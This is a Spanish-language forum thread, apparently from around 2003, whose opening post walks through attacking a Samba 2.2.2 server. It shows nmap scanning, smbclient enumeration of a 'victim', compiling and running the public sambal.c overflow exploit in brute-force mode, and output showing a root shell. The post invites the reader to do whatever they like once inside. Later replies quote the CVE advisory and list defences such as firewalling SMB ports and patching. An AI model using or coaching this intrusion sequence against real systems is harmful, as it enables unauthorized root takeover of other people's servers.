Como Explotar un samba

Forums: 

Hola a muchos de ustedes le interesa como explotar un Samba ok aqui va
buscar objetivo
nmap -O -o www.loquesea.com -PT0 -sX -p 1-1024

o usando uno de los scann de mi amigo El_ginecologo ell echo security scanner ess puedes encotrarlo en www.zone-h.org ok sigamos

luego de tener un resultado del scann tenemos esta lista

port state service
23 open telnet
139 open netbios

ahora para ver que comparte la victima
smbclient -L //ip_de_la_victima
Domain=[VICTIMA] OS=[Unix] Server=[Samba 2.2.2]

Sharename Type Comment
--------- ---- -------
sistemas disk sistemas
admin$ disk sistemas
Server Comment
--------- -------
WEBUIO

Workgroup Master
--------- -------
DOMAIN MAJESTAD
GLOBALIPG WEBSRVUIO
HOME ECU-ALA
INTERNET NS5
UDLA GTZ

listo comparte la carpeta sistemas
ahora podemos proceguir a explotar el samba remotamente aqui voy a pastear el exploit.
lo descargamos en www.netric.org
sambal.c

ok para compilarlo
gcc sambal.c -o sambal

lo ejecuto de esta forma
./sambal -b0 <ip>
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)

ok una vez dentro ya queda a tu imaginacion que hacer, tienes el poder en tu manos

Eso es todo gracias y un saludo a mi amgio El _ginecologo

Bien l0k0 Krusty...nos volvemos a encontrar a los tiempos......Hay que tratar de levantar el polvo de aqui..a ver si colaboras con la info que puedas..
Estamos en conthackto...
El GINE

Hasta la Victoria Siempre!

Imagen de RazaMetaL

Este exploit trabaja solo con samba 2.2.2 ?

como puedo prevenir un ataque de este tipo ?

-----

Visita este [url=http://www.sindominio.net/ayuda/preguntas-inteligentes.html]link[/url] :evil:

[img]http://www.bbspot.com/Images/News_Features/2003/01/os_quiz/debian.jpg[/img]

(adsbygoogle = window.adsbygoogle || []).push({});

/////Samba remote Buffer Overflow root exploit

Date de Publication: 2003-04-07
Bugtraq ID: xxx
Bugtraq-France ID : 0004
CVE : CAN-2003-0201
Titre: Samba remote Buffer Overflow root exploit
Class: Design Error
Exploitable

Hasta la Victoria Siempre!

Imagen de Epe

Hay varias formas de protegerse contra este ataque (y otros parecidos).

1- Implementar una solucion para evitar buffers oveflow (las hay y no son dificiles) - El 95% de los ataques de penetracion se realizan a traves de buffer overflows, te proteges contra eso, te proteges contra varios.
2- Proteger el samba con reglas en tu firewall para evitar accesos desde la internet a los puertos smb.
3- Actualizar tu samba

Mas o menos estas son, listadas en el orden que mas me gustan.

Saludos
Epe

Saludos
epe

EcuaLinux.com

+(593) 9 9924 6504

Servicios en Software Libre